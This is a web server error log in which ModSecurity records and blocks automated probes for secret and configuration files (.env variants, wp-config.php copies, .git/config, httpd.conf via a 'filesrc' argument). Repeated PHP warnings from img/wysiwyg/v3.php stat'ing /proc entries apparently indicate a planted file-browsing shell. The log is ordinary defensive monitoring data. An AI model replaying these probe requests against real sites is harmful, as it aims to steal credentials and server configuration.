[Tue May 12 01:38:28.431666 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/backup.wp-config.php"] [unique_id "agJodLvMumyrWMfSu7qWMAAAAMI"]
[Tue May 12 01:38:28.431855 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJodLvMumyrWMfSu7qWMAAAAMI"]
[Tue May 12 01:38:35.476079 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/new-wp-config.php"] [unique_id "agJoe7vMumyrWMfSu7qWXwAAAMI"]
[Tue May 12 01:38:35.476244 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/new-wp-config.php"] [unique_id "agJoe7vMumyrWMfSu7qWXwAAAMI"]
[Tue May 12 01:38:35.476487 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJoe7vMumyrWMfSu7qWXwAAAMI"]
PHP Warning:  filesize(): stat failed for /proc/110/task/110/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/110/task/110/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/110/task/110/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/110/task/110/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/110/task/110/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/110/task/110/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:39:10.683146 2026] [security2:error] [pid 1707624:tid 1707692] [client 43.153.208.49:54968] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJonrOxS7i6i_mT2NK2PwAAAEo"]
[Tue May 12 01:39:12.338209 2026] [authz_core:error] [pid 1709071:tid 1709089] [client 47.128.47.135:51386] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/swiftmailer/swiftmailer/lib/error_log
[Tue May 12 01:39:13.699544 2026] [security2:error] [pid 1691274:tid 1691293] [client 43.153.208.49:57544] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agJooVfdQaraX_prmqcMHwAAABE"], referer: https://pole-de-mobilite-regional.com/?p=1054
[Tue May 12 01:39:29.574499 2026] [security2:error] [pid 1709071:tid 1709097] [client 129.226.83.4:50696] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJosbvMumyrWMfSu7qW1wAAAMo"]
[Tue May 12 01:39:48.436229 2026] [security2:error] [pid 1695975:tid 1695991] [client 43.134.177.47:44154] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJoxNVI9ymHBxup7497kAAAAI0"]
PHP Warning:  filesize(): stat failed for /proc/60/task/60/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/60/task/60/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/60/task/60/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/60/task/60/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/60/task/60/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/60/task/60/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:39:58.810944 2026] [security2:error] [pid 1709071:tid 1709101] [client 216.73.216.110:31916] ModSecurity: Warning. Matched phrase "usr/local/apache/conf/httpd.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: usr/local/apache/conf/httpd.conf found within ARGS:filesrc: /usr/local/apache/conf/httpd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJozrvMumyrWMfSu7qXCQAAAM4"]
[Tue May 12 01:39:58.811625 2026] [security2:error] [pid 1709071:tid 1709101] [client 216.73.216.110:31916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJozrvMumyrWMfSu7qXCQAAAM4"]
[Tue May 12 01:39:58.898866 2026] [security2:error] [pid 1709071:tid 1709101] [client 216.73.216.110:31916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJozrvMumyrWMfSu7qXCQAAAM4"]
[Tue May 12 01:40:22.571975 2026] [ssl:error] [pid 1630927:tid 1630931] (EAI 2)Name or service not known: [client 34.105.147.8:60796] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 01:40:22.572484 2026] [ssl:error] [pid 1630927:tid 1630931] AH01941: stapling_renew_response: responder error
[Tue May 12 01:40:22.685921 2026] [security2:error] [pid 1630927:tid 1630931] [client 34.105.147.8:60796] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agJo5miGYYhUwDaJINnTmAAAAUE"]
[Tue May 12 01:40:22.686262 2026] [security2:error] [pid 1630927:tid 1630931] [client 34.105.147.8:60796] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agJo5miGYYhUwDaJINnTmAAAAUE"]
[Tue May 12 01:40:22.686513 2026] [security2:error] [pid 1630927:tid 1630931] [client 34.105.147.8:60796] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agJo5miGYYhUwDaJINnTmAAAAUE"]
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2926800/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2926800/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2926800/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2926800/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2926800/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2926800/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704265/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704265/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704265/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704265/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704265/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704265/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:40:51.126137 2026] [authz_core:error] [pid 1695975:tid 1695990] [client 216.73.216.110:4630] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/inc/entity/repository/error_log
[Tue May 12 01:41:12.329337 2026] [security2:error] [pid 1691274:tid 1691277] [client 23.137.105.175:57950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agJpGFfdQaraX_prmqcMjQAAAAA"]
[Tue May 12 01:41:12.329687 2026] [security2:error] [pid 1691274:tid 1691277] [client 23.137.105.175:57950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agJpGFfdQaraX_prmqcMjQAAAAA"]
[Tue May 12 01:41:12.330199 2026] [security2:error] [pid 1691274:tid 1691277] [client 23.137.105.175:57950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agJpGFfdQaraX_prmqcMjQAAAAA"]
[Tue May 12 01:41:12.351865 2026] [security2:error] [pid 1709071:tid 1709087] [client 23.137.105.175:58008] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agJpGLvMumyrWMfSu7qXwgAAAMA"]
[Tue May 12 01:41:12.351865 2026] [security2:error] [pid 1691274:tid 1691284] [client 23.137.105.175:57998] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agJpGFfdQaraX_prmqcMjgAAAAc"]
[Tue May 12 01:41:12.352054 2026] [security2:error] [pid 1709071:tid 1709087] [client 23.137.105.175:58008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agJpGLvMumyrWMfSu7qXwgAAAMA"]
[Tue May 12 01:41:12.352053 2026] [security2:error] [pid 1691274:tid 1691284] [client 23.137.105.175:57998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agJpGFfdQaraX_prmqcMjgAAAAc"]
[Tue May 12 01:41:12.352162 2026] [security2:error] [pid 1695975:tid 1695987] [client 23.137.105.175:57992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agJpGNVI9ymHBxup7498BgAAAIk"]
[Tue May 12 01:41:12.352282 2026] [security2:error] [pid 1709071:tid 1709087] [client 23.137.105.175:58008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agJpGLvMumyrWMfSu7qXwgAAAMA"]
[Tue May 12 01:41:12.352318 2026] [security2:error] [pid 1695975:tid 1695987] [client 23.137.105.175:57992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agJpGNVI9ymHBxup7498BgAAAIk"]
[Tue May 12 01:41:12.352339 2026] [security2:error] [pid 1691274:tid 1691284] [client 23.137.105.175:57998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agJpGFfdQaraX_prmqcMjgAAAAc"]
[Tue May 12 01:41:12.352341 2026] [security2:error] [pid 1707624:tid 1707688] [client 23.137.105.175:57980] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agJpGLOxS7i6i_mT2NK3MAAAAEY"]
[Tue May 12 01:41:12.352500 2026] [security2:error] [pid 1707624:tid 1707688] [client 23.137.105.175:57980] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agJpGLOxS7i6i_mT2NK3MAAAAEY"]
[Tue May 12 01:41:12.352517 2026] [security2:error] [pid 1695975:tid 1695987] [client 23.137.105.175:57992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agJpGNVI9ymHBxup7498BgAAAIk"]
[Tue May 12 01:41:12.352704 2026] [security2:error] [pid 1707624:tid 1707688] [client 23.137.105.175:57980] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agJpGLOxS7i6i_mT2NK3MAAAAEY"]
[Tue May 12 01:41:12.355141 2026] [security2:error] [pid 1709071:tid 1709090] [client 23.137.105.175:57958] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agJpGLvMumyrWMfSu7qXwwAAAMM"]
[Tue May 12 01:41:12.355283 2026] [security2:error] [pid 1709071:tid 1709090] [client 23.137.105.175:57958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agJpGLvMumyrWMfSu7qXwwAAAMM"]
[Tue May 12 01:41:12.355760 2026] [security2:error] [pid 1709071:tid 1709090] [client 23.137.105.175:57958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agJpGLvMumyrWMfSu7qXwwAAAMM"]
PHP Warning:  filesize(): stat failed for /proc/332/task/332/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/332/task/332/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/332/task/332/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/332/task/332/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/332/task/332/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/332/task/332/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
